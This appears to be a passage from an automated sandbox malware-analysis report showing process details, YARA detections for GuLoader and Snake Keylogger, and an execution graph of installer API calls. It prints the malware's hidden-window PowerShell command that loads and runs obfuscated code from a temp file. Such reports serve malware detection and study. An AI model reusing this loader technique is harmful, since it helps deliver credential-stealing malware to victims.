                                              Commandline:"powershell.exe" -windowstyle hidden "$nonrationally=Get-Content 'C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Kompottens.Sub';$Blgekams=$nonrationally.SubString(70407,3);.$Blgekams($nonrationally) "
                                              Imagebase:0xa60000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2247218971.000000000925B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              Target ID:3
                                              Start time:04:04:33
                                              Start date:25/07/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff6ee680000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Target ID:10
                                              Start time:04:05:44
                                              Start date:25/07/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0x110000
                                              File size:516'608 bytes
                                              MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.2653419991.00000000251E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:false

                                                Execution Graph

                                                Execution Coverage:20.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:22.2%
                                                Total number of Nodes:1277
                                                Total number of Limit Nodes:34
SetWindowTextW 3447->3448 3449 401389 2 API calls 3448->3449 3449->3430 3450->3408 3451 404012 CreateDialogParamW 3450->3451 3451->3408 3452 404045 3451->3452 3453 40412d 19 API calls 3452->3453 3454 404050 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3453->3454 3455 401389 2 API calls 3454->3455 3456 404096 3455->3456 3456->3403 3457 40409e ShowWindow 3456->3457 3458 404179 SendMessageW 3457->3458 3458->3408 3459->3440 3460->3443 3461->3446 3463 401389 2 API calls 3462->3463 3464 401420 3463->3464 3464->3433 3940 4014d7 3941 402b1b 18 API calls 3940->3941 3942 4014dd Sleep 3941->3942 3944 4029c5 3942->3944 3465 403358 #17 SetErrorMode OleInitialize 3466 406252 3 API calls 3465->3466 3467 40339b SHGetFileInfoW 3466->3467 3538 405ee8 lstrcpynW 3467->3538 3469 4033c6 GetCommandLineW 3539 405ee8 lstrcpynW 3469->3539 3471 4033d8 GetModuleHandleW 3472 4033f0 3471->3472 3473 405960 CharNextW 3472->3473 3474 4033ff CharNextW 3473->3474 3476 40340f 3474->3476 3475 4034e4 3477 4034f8 GetTempPathW 3475->3477 3476->3475 3476->3476 3480 405960 CharNextW 3476->3480 3488 4034e6 3476->3488 3540 403324 3477->3540 3479 403510 3481 403514 GetWindowsDirectoryW lstrcatW 3479->3481 3482 40356a DeleteFileW 3479->3482 3480->3476 3483 403324 11 API calls 3481->3483 3548 402dba GetTickCount GetModuleFileNameW 3482->3548 3485 403530 3483->3485 3485->3482 3487 403534 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3485->3487 3486 40357e 3489 403616 3486->3489 3491 403606 3486->3491 3495 405960 CharNextW 3486->3495 3490 403324 11 API calls 3487->3490 3632 405ee8 lstrcpynW 3488->3632 3635 4037c0 3489->3635 3494 403562 3490->3494 3578 4038b2 3491->3578 3494->3482 3494->3489 3498 403599 3495->3498 3504 4035e0 3498->3504 3505 403645 lstrcatW lstrcmpiW 3498->3505 3499 403725 3502 4037a8 ExitProcess 3499->3502 3506 406252 3 API calls 3499->3506 3500 40362f 3501 4056c4 MessageBoxIndirectW 3500->3501 3503 40363d ExitProcess 3501->3503 3508 405a3b 18 API calls 3504->3508 
3505->3489 3509 403661 CreateDirectoryW SetCurrentDirectoryW 3505->3509 3510 403734 3506->3510 3511 4035ec 3508->3511 3512 403684 3509->3512 3513 403679 3509->3513 3514 406252 3 API calls 3510->3514 3511->3489 3633 405ee8 lstrcpynW 3511->3633 3645 405ee8 lstrcpynW 3512->3645 3644 405ee8 lstrcpynW 3513->3644 3517 40373d 3514->3517 3519 406252 3 API calls 3517->3519 3520 403746 3519->3520 3522 403794 ExitWindowsEx 3520->3522 3527 403754 GetCurrentProcess 3520->3527 3521 4035fb 3634 405ee8 lstrcpynW 3521->3634 3522->3502 3525 4037a1 3522->3525 3524 405f0a 18 API calls 3526 4036c3 DeleteFileW 3524->3526 3528 40140b 2 API calls 3525->3528 3529 4036d0 CopyFileW 3526->3529 3535 403692 3526->3535 3531 403764 3527->3531 3528->3502 3529->3535 3530 403719 3532 405d82 40 API calls 3530->3532 3531->3522 3532->3489 3533 405d82 40 API calls 3533->3535 3534 405f0a 18 API calls 3534->3535 3535->3524 3535->3530 3535->3533 3535->3534 3536 405663 2 API calls 3535->3536 3537 403704 CloseHandle 3535->3537 3536->3535 3537->3535 3538->3469 3539->3471 3541 40617c 5 API calls 3540->3541 3542 403330 3541->3542 3543 40333a 3542->3543 3544 405933 3 API calls 3542->3544 3543->3479 3545 403342 CreateDirectoryW 3544->3545 3646 405b83 3545->3646 3650 405b54 GetFileAttributesW CreateFileW 3548->3650 3550 402dfd 3577 402e0a 3550->3577 3651 405ee8 lstrcpynW 3550->3651 3552 402e20 3553 40597f 2 API calls 3552->3553 3554 402e26 3553->3554 3652 405ee8 lstrcpynW 3554->3652 3556 402e31 GetFileSize 3557 402f32 3556->3557 3559 402e48 3556->3559 3558 402d18 33 API calls 3557->3558 3560 402f39 3558->3560 3559->3557 3561 4032f7 ReadFile 3559->3561 3563 402fcd 3559->3563 3570 402d18 33 API calls 3559->3570 3559->3577 3562 402f75 GlobalAlloc 3560->3562 3560->3577 3654 40330d SetFilePointer 3560->3654 3561->3559 3566 402f8c 3562->3566 3564 402d18 33 API calls 3563->3564 3564->3577 3568 405b83 2 API calls 3566->3568 3567 402f56 3569 4032f7 ReadFile 3567->3569 3571 402f9d CreateFileW 3568->3571 3572 402f61 
3569->3572 3570->3559 3573 402fd7 3571->3573 3571->3577 3572->3562 3572->3577 3653 40330d SetFilePointer 3573->3653 3575 402fe5 3576 403060 46 API calls 3575->3576 3576->3577 3577->3486 3577->3577 3579 406252 3 API calls 3578->3579 3580 4038c6 3579->3580 3581 4038cc 3580->3581 3582 4038de 3580->3582 3664 405e2f wsprintfW 3581->3664 3583 405db5 3 API calls 3582->3583 3584 40390e 3583->3584 3585 40392d lstrcatW 3584->3585 3587 405db5 3 API calls 3584->3587 3588 4038dc 3585->3588 3587->3585 3655 403b88 3588->3655 3591 405a3b 18 API calls 3592 40395f 3591->3592 3593 4039f3 3592->3593 3595 405db5 3 API calls 3592->3595 3594 405a3b 18 API calls 3593->3594 3596 4039f9 3594->3596 3597 403991 3595->3597 3598 403a09 LoadImageW 3596->3598 3601 405f0a 18 API calls 3596->3601 3597->3593 3605 4039b2 lstrlenW 3597->3605 3609 405960 CharNextW 3597->3609 3599 403a30 RegisterClassW 3598->3599 3600 403aaf 3598->3600 3602 403a66 SystemParametersInfoW CreateWindowExW 3599->3602 3603 403ab9 3599->3603 3604 40140b 2 API calls 3600->3604 3601->3598 3602->3600 3603->3489 3608 403ab5 3604->3608 3606 4039c0 lstrcmpiW 3605->3606 3607 4039e6 3605->3607 3606->3607 3610 4039d0 GetFileAttributesW 3606->3610 3611 405933 3 API calls 3607->3611 3608->3603 3614 403b88 19 API calls 3608->3614 3612 4039af 3609->3612 3613 4039dc 3610->3613 3615 4039ec 3611->3615 3612->3605 3613->3607 3616 40597f 2 API calls 3613->3616 3617 403ac6 3614->3617 3665 405ee8 lstrcpynW 3615->3665 3616->3607 3619 403ad2 ShowWindow LoadLibraryW 3617->3619 3620 403b55 3617->3620 3622 403af1 LoadLibraryW 3619->3622 3623 403af8 GetClassInfoW 3619->3623 3621 405265 5 API calls 3620->3621 3624 403b5b 3621->3624 3622->3623 3625 403b22 DialogBoxParamW 3623->3625 3626 403b0c GetClassInfoW RegisterClassW 3623->3626 3627 403b77 3624->3627 3628 403b5f 3624->3628 3629 40140b 2 API calls 3625->3629 3626->3625 3630 40140b 2 API calls 3627->3630 3628->3603 3631 40140b 2 API calls 3628->3631 3629->3603 3630->3603 3631->3603 3632->3477 
3633->3521 3634->3491 3636 4037d1 CloseHandle 3635->3636 3637 4037db 3635->3637 3636->3637 3638 4037e5 CloseHandle 3637->3638 3639 4037ef 3637->3639 3638->3639 3667 40381d 3639->3667 3642 405770 71 API calls 3643 40361f OleUninitialize 3642->3643 3643->3499 3643->3500 3644->3512 3645->3535 3647 405b90 GetTickCount GetTempFileNameW 3646->3647 3648 405bc6 3647->3648 3649 403356 3647->3649 3648->3647 3648->3649 3649->3479 3650->3550 3651->3552 3652->3556 3653->3575 3654->3567 3656 403b9c 3655->3656 3666 405e2f wsprintfW 3656->3666 3658 403c0d 3659 405f0a 18 API calls 3658->3659 3660 403c19 SetWindowTextW 3659->3660 3661 40393d 3660->3661 3662 403c35 3660->3662 3661->3591 3662->3661 3663 405f0a 18 API calls 3662->3663 3663->3662 3664->3588 3665->3593 3666->3658 3668 40382b 3667->3668 3669 403830 FreeLibrary GlobalFree 3668->3669 3670 4037f4 3668->3670 3669->3669 3669->3670 3670->3642 3945 40155b 3946 40296b 3945->3946 3949 405e2f wsprintfW 3946->3949 3948 402970 3949->3948 3957 4023de 3958 402c42 19 API calls 3957->3958 3959 4023e8 3958->3959 3960 402b38 18 API calls 3959->3960 3961 4023f1 3960->3961 3962 4023fc RegQueryValueExW 3961->3962 3965 402791 3961->3965 3963 402422 RegCloseKey 3962->3963 3964 40241c 3962->3964 3963->3965 3964->3963 3968 405e2f wsprintfW 3964->3968 3968->3963 3969 401ce5 GetDlgItem GetClientRect 3970 402b38 18 API calls 3969->3970 3971 401d17 LoadImageW SendMessageW 3970->3971 3972 4029c5 3971->3972 3973 401d35 DeleteObject 3971->3973 3973->3972 3974 401de8 EnableWindow 3975 4029c5 3974->3975 3976 40206a 3977 402b38 18 API calls 3976->3977 3978 402071 3977->3978 3979 402b38 18 API calls 3978->3979 3980 40207b 3979->3980 3981 402b38 18 API calls 3980->3981 3982 402084 3981->3982 3983 402b38 18 API calls 3982->3983 3984 40208e 3983->3984 3985 402b38 18 API calls 3984->3985 3986 402098 3985->3986 3987 4020ac CoCreateInstance 3986->3987 3988 402b38 18 API calls 3986->3988 3991 4020cb 3987->3991 3988->3987 3989 401423 25 API calls 3990 402195 
3989->3990 3991->3989 3991->3990 3992 40156b 3993 401584 3992->3993 3994 40157b ShowWindow 3992->3994 3995 401592 ShowWindow 3993->3995 3996 4029c5 3993->3996 3994->3993 3995->3996 3997 4024ec 3998 4024f1 3997->3998 3999 40250a 3997->3999 4000 402b1b 18 API calls 3998->4000 4001 402510 3999->4001 4002 40253c 3999->4002 4007 4024f8 4000->4007 4003 402b38 18 API calls 4001->4003 4004 402b38 18 API calls 4002->4004 4005 402517 WideCharToMultiByte lstrlenA 4003->4005 4006 402543 lstrlenW 4004->4006 4005->4007 4006->4007 4008 402565 WriteFile 4007->4008 4009 402791 4007->4009 4008->4009 4010 40276e 4011 402b38 18 API calls 4010->4011 4012 402775 FindFirstFileW 4011->4012 4013 40279d 4012->4013 4017 402788 4012->4017 4015 4027a6 4013->4015 4018 405e2f wsprintfW 4013->4018 4019 405ee8 lstrcpynW 4015->4019 4018->4015 4019->4017 4020 4018ef 4021 401926 4020->4021 4022 402b38 18 API calls 4021->4022 4023 40192b 4022->4023 4024 405770 71 API calls 4023->4024 4025 401934 4024->4025 4026 403870 4027 40387b 4026->4027 4028 403882 GlobalAlloc 4027->4028 4029 40387f 4027->4029 4028->4029 4030 402571 4031 402b1b 18 API calls 4030->4031 4035 402580 4031->4035 4032 40269e 4033 4025c6 ReadFile 4033->4032 4033->4035 4034 405bd7 ReadFile 4034->4035 4035->4032 4035->4033 4035->4034 4036 4026a0 4035->4036 4037 402606 MultiByteToWideChar 4035->4037 4039 40262c SetFilePointer MultiByteToWideChar 4035->4039 4040 4026b1 4035->4040 4042 405e2f wsprintfW 4036->4042 4037->4035 4039->4035 4040->4032 4041 4026d2 SetFilePointer 4040->4041 4041->4032 4042->4032 4043 4014f1 SetForegroundWindow 4044 4029c5 4043->4044 4052 4018f2 4053 402b38 18 API calls 4052->4053 4054 4018f9 4053->4054 4055 4056c4 MessageBoxIndirectW 4054->4055 4056 401902 4055->4056 4064 401df3 4065 402b38 18 API calls 4064->4065 4066 401df9 4065->4066 4067 402b38 18 API calls 4066->4067 4068 401e02 4067->4068 4069 402b38 18 API calls 4068->4069 4070 401e0b 4069->4070 4071 402b38 18 API calls 4070->4071 4072 401e14 4071->4072 4073 
401423 25 API calls 4072->4073 4074 401e1b ShellExecuteW 4073->4074 4075 401e4c 4074->4075 4081 4026f7 4082 4026fe 4081->4082 4085 402970 4081->4085 4083 402b1b 18 API calls 4082->4083 4084 402709 4083->4084 4086 402710 SetFilePointer 4084->4086 4086->4085 4087 402720 4086->4087 4089 405e2f wsprintfW 4087->4089 4089->4085 4097 40427b lstrlenW 4098 40429a 4097->4098 4099 40429c WideCharToMultiByte 4097->4099 4098->4099 4100 402c7d 4101 402ca8 4100->4101 4102 402c8f SetTimer 4100->4102 4103 402cf6 4101->4103 4104 402cfc MulDiv 4101->4104 4102->4101 4105 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 4104->4105 4105->4103 4107 4014ff 4108 401507 4107->4108 4110 40151a 4107->4110 4109 402b1b 18 API calls 4108->4109 4109->4110 4111 401000 4112 401037 BeginPaint GetClientRect 4111->4112 4113 40100c DefWindowProcW 4111->4113 4115 4010f3 4112->4115 4116 401179 4113->4116 4117 401073 CreateBrushIndirect FillRect DeleteObject 4115->4117 4118 4010fc 4115->4118 4117->4115 4119 401102 CreateFontIndirectW 4118->4119 4120 401167 EndPaint 4118->4120 4119->4120 4121 401112 6 API calls 4119->4121 4120->4116 4121->4120 4122 401a00 4123 402b38 18 API calls 4122->4123 4124 401a09 ExpandEnvironmentStringsW 4123->4124 4125 401a1d 4124->4125 4127 401a30 4124->4127 4126 401a22 lstrcmpW 4125->4126 4125->4127 4126->4127 4128 401b01 4129 402b38 18 API calls 4128->4129 4130 401b08 4129->4130 4131 402b1b 18 API calls 4130->4131 4132 401b11 wsprintfW 4131->4132 4133 4029c5 4132->4133 4134 404581 4135 404591 4134->4135 4136 4045b7 4134->4136 4137 40412d 19 API calls 4135->4137 4138 404194 8 API calls 4136->4138 4140 40459e SetDlgItemTextW 4137->4140 4139 4045c3 4138->4139 4140->4136 4141 405106 4142 405116 4141->4142 4143 40512a 4141->4143 4144 405173 4142->4144 4145 40511c 4142->4145 4146 405132 IsWindowVisible 4143->4146 4152 405149 4143->4152 4147 405178 CallWindowProcW 4144->4147 4148 404179 SendMessageW 4145->4148 4146->4144 4149 40513f 4146->4149 4150 405126 4147->4150 4148->4150 4154 
404a5c SendMessageW 4149->4154 4152->4147 4159 404adc 4152->4159 4155 404abb SendMessageW 4154->4155 4156 404a7f GetMessagePos ScreenToClient SendMessageW 4154->4156 4157 404ab3 4155->4157 4156->4157 4158 404ab8 4156->4158 4157->4152 4158->4155 4168 405ee8 lstrcpynW 4159->4168 4161 404aef 4169 405e2f wsprintfW 4161->4169 4163 404af9 4164 40140b 2 API calls 4163->4164 4165 404b02 4164->4165 4170 405ee8 lstrcpynW 4165->4170 4167 404b09 4167->4144 4168->4161 4169->4163 4170->4167 4171 401f08 4172 402b38 18 API calls 4171->4172 4173 401f0f GetFileVersionInfoSizeW 4172->4173 4174 401f8c 4173->4174 4175 401f36 GlobalAlloc 4173->4175 4175->4174 4176 401f4a GetFileVersionInfoW 4175->4176 4176->4174 4177 401f59 VerQueryValueW 4176->4177 4177->4174 4178 401f72 4177->4178 4182 405e2f wsprintfW 4178->4182 4180 401f7e 4183 405e2f wsprintfW 4180->4183 4182->4180 4183->4174 4191 404b0e GetDlgItem GetDlgItem 4192 404b60 7 API calls 4191->4192 4199 404d79 4191->4199 4193 404c03 DeleteObject 4192->4193 4194 404bf6 SendMessageW 4192->4194 4195 404c0c 4193->4195 4194->4193 4196 404c43 4195->4196 4198 405f0a 18 API calls 4195->4198 4200 40412d 19 API calls 4196->4200 4197 404e5d 4201 404f09 4197->4201 4210 404eb6 SendMessageW 4197->4210 4234 404d6c 4197->4234 4202 404c25 SendMessageW SendMessageW 4198->4202 4199->4197 4208 404a5c 5 API calls 4199->4208 4220 404dea 4199->4220 4205 404c57 4200->4205 4203 404f13 SendMessageW 4201->4203 4204 404f1b 4201->4204 4202->4195 4203->4204 4212 404f34 4204->4212 4213 404f2d ImageList_Destroy 4204->4213 4221 404f44 4204->4221 4209 40412d 19 API calls 4205->4209 4206 404194 8 API calls 4211 4050ff 4206->4211 4207 404e4f SendMessageW 4207->4197 4208->4220 4225 404c65 4209->4225 4215 404ecb SendMessageW 4210->4215 4210->4234 4216 404f3d GlobalFree 4212->4216 4212->4221 4213->4212 4214 4050b3 4222 4050c5 ShowWindow GetDlgItem ShowWindow 4214->4222 4214->4234 4218 404ede 4215->4218 4216->4221 4217 404d3a GetWindowLongW SetWindowLongW 4219 404d53 
4217->4219 4226 404eef SendMessageW 4218->4226 4223 404d71 4219->4223 4224 404d59 ShowWindow 4219->4224 4220->4197 4220->4207 4221->4214 4233 404adc 4 API calls 4221->4233 4236 404f7f 4221->4236 4222->4234 4243 404162 SendMessageW 4223->4243 4242 404162 SendMessageW 4224->4242 4225->4217 4227 404d34 4225->4227 4230 404cb5 SendMessageW 4225->4230 4231 404cf1 SendMessageW 4225->4231 4232 404d02 SendMessageW 4225->4232 4226->4201 4227->4217 4227->4219 4230->4225 4231->4225 4232->4225 4233->4236 4234->4206 4235 405089 InvalidateRect 4235->4214 4237 40509f 4235->4237 4238 404fad SendMessageW 4236->4238 4239 404fc3 4236->4239 4240 404976 21 API calls 4237->4240 4238->4239 4239->4235 4241 405037 SendMessageW SendMessageW 4239->4241 4240->4214 4241->4239 4242->4234 4243->4199 4244 404910 4245 404920 4244->4245 4246 40493c 4244->4246 4255 4056a8 GetDlgItemTextW 4245->4255 4248 404942 SHGetPathFromIDListW 4246->4248 4249 40496f 4246->4249 4251 404959 SendMessageW 4248->4251 4252 404952 4248->4252 4250 40492d SendMessageW 4250->4246 4251->4249 4254 40140b 2 API calls 4252->4254 4254->4251 4255->4250 4256 401491 4257 405192 25 API calls 4256->4257 4258 401498 4257->4258 4259 402293 4260 402b38 18 API calls 4259->4260 4261 4022a2 4260->4261 4262 402b38 18 API calls 4261->4262 4263 4022ab 4262->4263 4264 402b38 18 API calls 4263->4264 4265 4022b5 GetPrivateProfileStringW 4264->4265 4266 401718 4267 402b38 18 API calls 4266->4267 4268 40171f SearchPathW 4267->4268 4269 40173a 4268->4269 4270 401f98 4271 401faa 4270->4271 4281 40205c 4270->4281 4272 402b38 18 API calls 4271->4272 4274 401fb1 4272->4274 4273 401423 25 API calls 4279 402195 4273->4279 4275 402b38 18 API calls 4274->4275 4276 401fba 4275->4276 4277 401fd0 LoadLibraryExW 4276->4277 4278 401fc2 GetModuleHandleW 4276->4278 4280 401fe1 4277->4280 4277->4281 4278->4277 4278->4280 4290 4062be WideCharToMultiByte 4280->4290 4281->4273 4284 401ff2 4287 401423 25 API calls 4284->4287 4288 402002 4284->4288 4285 40202b 4286 
405192 25 API calls 4285->4286 4286->4288 4287->4288 4288->4279 4289 40204e FreeLibrary 4288->4289 4289->4279 4291 4062e8 GetProcAddress 4290->4291 4292 401fec 4290->4292 4291->4292 4292->4284 4292->4285 3693 40159b 3694 402b38 18 API calls 3693->3694 3695 4015a2 SetFileAttributesW 3694->3695 3696 4015b4 3695->3696 4293 40149e 4294 40223c 4293->4294 4295 4014ac PostQuitMessage 4293->4295 4295->4294 4296 40219e 4297 402b38 18 API calls 4296->4297 4298 4021a4 4297->4298 4299 402b38 18 API calls 4298->4299 4300 4021ad 4299->4300 4301 402b38 18 API calls 4300->4301 4302 4021b6 4301->4302 4303 40622b 2 API calls 4302->4303 4304 4021bf 4303->4304 4305 4021d0 lstrlenW lstrlenW 4304->4305 4306 4021c3 4304->4306 4307 405192 25 API calls 4305->4307 4308 405192 25 API calls 4306->4308 4310 4021cb 4306->4310 4309 40220e SHFileOperationW 4307->4309 4308->4310 4309->4306 4309->4310 4311 4029a0 SendMessageW 4312 4029c5 4311->4312 4313 4029ba InvalidateRect 4311->4313 4313->4312 4321 401b22 4322 401b73 4321->4322 4323 401b2f 4321->4323 4325 401b78 4322->4325 4326 401b9d GlobalAlloc 4322->4326 4324 402229 4323->4324 4330 401b46 4323->4330 4327 405f0a 18 API calls 4324->4327 4335 401bb8 4325->4335 4342 405ee8 lstrcpynW 4325->4342 4328 405f0a 18 API calls 4326->4328 4329 402236 4327->4329 4328->4335 4336 4056c4 MessageBoxIndirectW 4329->4336 4340 405ee8 lstrcpynW 4330->4340 4333 401b8a GlobalFree 4333->4335 4334 401b55 4341 405ee8 lstrcpynW 4334->4341 4336->4335 4338 401b64 4343 405ee8 lstrcpynW 4338->4343 4340->4334 4341->4338 4342->4333 4343->4335 4344 402222 4345 402229 4344->4345 4348 40223c 4344->4348 4346 405f0a 18 API calls 4345->4346 4347 402236 4346->4347 4349 4056c4 MessageBoxIndirectW 4347->4349 4349->4348 3272 401924 3273 401926 3272->3273 3274 402b38 18 API calls 3273->3274 3275 40192b 3274->3275 3278 405770 3275->3278 3317 405a3b 3278->3317 3281 405798 DeleteFileW 3288 401934 3281->3288 3283 4057af 3284 4058cf 3283->3284 3331 405ee8 lstrcpynW 3283->3331 3284->3288 3291 
40622b 2 API calls 3284->3291 3285 4057d5 3286 4057e8 3285->3286 3287 4057db lstrcatW 3285->3287 3332 40597f lstrlenW 3286->3332 3289 4057ee 3287->3289 3292 4057fe lstrcatW 3289->3292 3294 405809 lstrlenW FindFirstFileW 3289->3294 3293 4058f4 3291->3293 3292->3294 3293->3288 3295 4058f8 3293->3295 3294->3284 3303 40582b 3294->3303 3296 405933 3 API calls 3295->3296 3297 4058fe 3296->3297 3299 405728 5 API calls 3297->3299 3298 4058b2 FindNextFileW 3301 4058c8 FindClose 3298->3301 3298->3303 3302 40590a 3299->3302 3301->3284 3304 405924 3302->3304 3305 40590e 3302->3305 3303->3298 3312 405873 3303->3312 3336 405ee8 lstrcpynW 3303->3336 3307 405192 25 API calls 3304->3307 3305->3288 3308 405192 25 API calls 3305->3308 3307->3288 3310 40591b 3308->3310 3309 405770 64 API calls 3309->3312 3311 405d82 40 API calls 3310->3311 3314 405922 3311->3314 3312->3298 3312->3309 3313 405192 25 API calls 3312->3313 3315 405192 25 API calls 3312->3315 3337 405728 3312->3337 3345 405d82 3312->3345 3313->3298 3314->3288 3315->3312 3350 405ee8 lstrcpynW 3317->3350 3319 405a4c 3351 4059de CharNextW CharNextW 3319->3351 3322 405790 3322->3281 3322->3283 3323 40617c 5 API calls 3326 405a62 3323->3326 3324 405a93 lstrlenW 3325 405a9e 3324->3325 3324->3326 3328 405933 3 API calls 3325->3328 3326->3322 3326->3324 3327 40622b 2 API calls 3326->3327 3330 40597f 2 API calls 3326->3330 3327->3326 3329 405aa3 GetFileAttributesW 3328->3329 3329->3322 3330->3324 3331->3285 3333 40598d 3332->3333 3334 405993 CharPrevW 3333->3334 3335 40599f 3333->3335 3334->3333 3334->3335 3335->3289 3336->3303 3338 405b2f 2 API calls 3337->3338 3339 405734 3338->3339 3340 405743 RemoveDirectoryW 3339->3340 3341 40574b DeleteFileW 3339->3341 3343 405755 3339->3343 3342 405751 3340->3342 3341->3342 3342->3343 3344 405761 SetFileAttributesW 3342->3344 3343->3312 3344->3343 3346 406252 3 API calls 3345->3346 3347 405d89 3346->3347 3349 405daa 3347->3349 3357 405c06 lstrcpyW 3347->3357 3349->3312 3350->3319 3352 4059fb 
3351->3352 3353 405a0d 3351->3353 3352->3353 3354 405a08 CharNextW 3352->3354 3355 405960 CharNextW 3353->3355 3356 405a31 3353->3356 3354->3356 3355->3353 3356->3322 3356->3323 3358 405c55 GetShortPathNameW 3357->3358 3359 405c2f 3357->3359 3361 405c6a 3358->3361 3362 405d7c 3358->3362 3382 405b54 GetFileAttributesW CreateFileW 3359->3382 3361->3362 3364 405c72 wsprintfA 3361->3364 3362->3349 3363 405c39 CloseHandle GetShortPathNameW 3363->3362 3365 405c4d 3363->3365 3366 405f0a 18 API calls 3364->3366 3365->3358 3365->3362 3367 405c9a 3366->3367 3383 405b54 GetFileAttributesW CreateFileW 3367->3383 3369 405ca7 3369->3362 3370 405cb6 GetFileSize GlobalAlloc 3369->3370 3371 405d75 CloseHandle 3370->3371 3372 405cd8 3370->3372 3371->3362 3373 405bd7 ReadFile 3372->3373 3374 405ce0 3373->3374 3374->3371 3384 405ab9 lstrlenA 3374->3384 3377 405cf7 lstrcpyA 3380 405d19 3377->3380 3378 405d0b 3379 405ab9 4 API calls 3378->3379 3379->3380 3381 405d50 SetFilePointer WriteFile GlobalFree 3380->3381 3381->3371 3382->3363 3383->3369 3385 405afa lstrlenA 3384->3385 3386 405b02 3385->3386 3387 405ad3 lstrcmpiA 3385->3387 3386->3377 3386->3378 3387->3386 3388 405af1 CharNextA 3387->3388 3388->3385 4350 402727 4351 4029c5 4350->4351 4352 40272e 4350->4352 4353 402734 FindClose 4352->4353 4353->4351 4354 401cab 4355 402b1b 18 API calls 4354->4355 4356 401cb2 4355->4356 4357 402b1b 18 API calls 4356->4357 4358 401cba GetDlgItem 4357->4358 4359 4024e6 4358->4359 3697 40232f 3698 402335 3697->3698 3699 402b38 18 API calls 3698->3699 3700 402347 3699->3700 3701 402b38 18 API calls 3700->3701 3702 402351 RegCreateKeyExW 3701->3702 3703 402791 3702->3703 3704 40237b 3702->3704 3705 402396 3704->3705 3706 402b38 18 API calls 3704->3706 3707 4023a2 3705->3707 3714 402b1b 3705->3714 3708 40238c lstrlenW 3706->3708 3710 4023bd RegSetValueExW 3707->3710 3711 403060 46 API calls 3707->3711 3708->3705 3712 4023d3 RegCloseKey 3710->3712 3711->3710 3712->3703 3715 405f0a 18 API calls 3714->3715 
3716 402b2f 3715->3716 3716->3707 4360 4016af 4361 402b38 18 API calls 4360->4361 4362 4016b5 GetFullPathNameW 4361->4362 4363 4016f1 4362->4363 4364 4016cf 4362->4364 4365 4029c5 4363->4365 4366 401706 GetShortPathNameW 4363->4366 4364->4363 4367 40622b 2 API calls 4364->4367 4366->4365 4368 4016e1 4367->4368 4368->4363 4370 405ee8 lstrcpynW 4368->4370 4370->4363 4371 406c30 4374 4063c1 4371->4374 4372 406442 GlobalFree 4373 40644b GlobalAlloc 4372->4373 4373->4374 4375 406d2c 4373->4375 4374->4372 4374->4373 4374->4374 4374->4375 4376 4064c2 GlobalAlloc 4374->4376 4377 4064b9 GlobalFree 4374->4377 4376->4374 4376->4375 4377->4376 4378 4027b3 4379 402b38 18 API calls 4378->4379 4380 4027c1 4379->4380 4381 4027d7 4380->4381 4382 402b38 18 API calls 4380->4382 4383 405b2f 2 API calls 4381->4383 4382->4381 4384 4027dd 4383->4384 4404 405b54 GetFileAttributesW CreateFileW 4384->4404 4386 4027ea 4387 402893 4386->4387 4388 4027f6 GlobalAlloc 4386->4388 4391 40289b DeleteFileW 4387->4391 4392 4028ae 4387->4392 4389 40288a CloseHandle 4388->4389 4390 40280f 4388->4390 4389->4387 4405 40330d SetFilePointer 4390->4405 4391->4392 4394 402815 4395 4032f7 ReadFile 4394->4395 4396 40281e GlobalAlloc 4395->4396 4397 402862 WriteFile GlobalFree 4396->4397 4398 40282e 4396->4398 4400 403060 46 API calls 4397->4400 4399 403060 46 API calls 4398->4399 4403 40283b 4399->4403 4401 402887 4400->4401 4401->4389 4402 402859 GlobalFree 4402->4397 4403->4402 4404->4386 4405->4394 4406 4028b4 4407 402b1b 18 API calls 4406->4407 4408 4028ba 4407->4408 4409 4028f6 4408->4409 4410 4028dd 4408->4410 4413 402791 4408->4413 4411 402900 4409->4411 4412 40290c 4409->4412 4414 4028e2 4410->4414 4419 4028f3 4410->4419 4415 402b1b 18 API calls 4411->4415 4416 405f0a 18 API calls 4412->4416 4420 405ee8 lstrcpynW 4414->4420 4415->4419 4416->4419 4419->4413 4421 405e2f wsprintfW 4419->4421 4420->4413 4421->4413 4422 4014b8 4423 4014be 4422->4423 4424 401389 2 API calls 4423->4424 4425 4014c6 4424->4425 
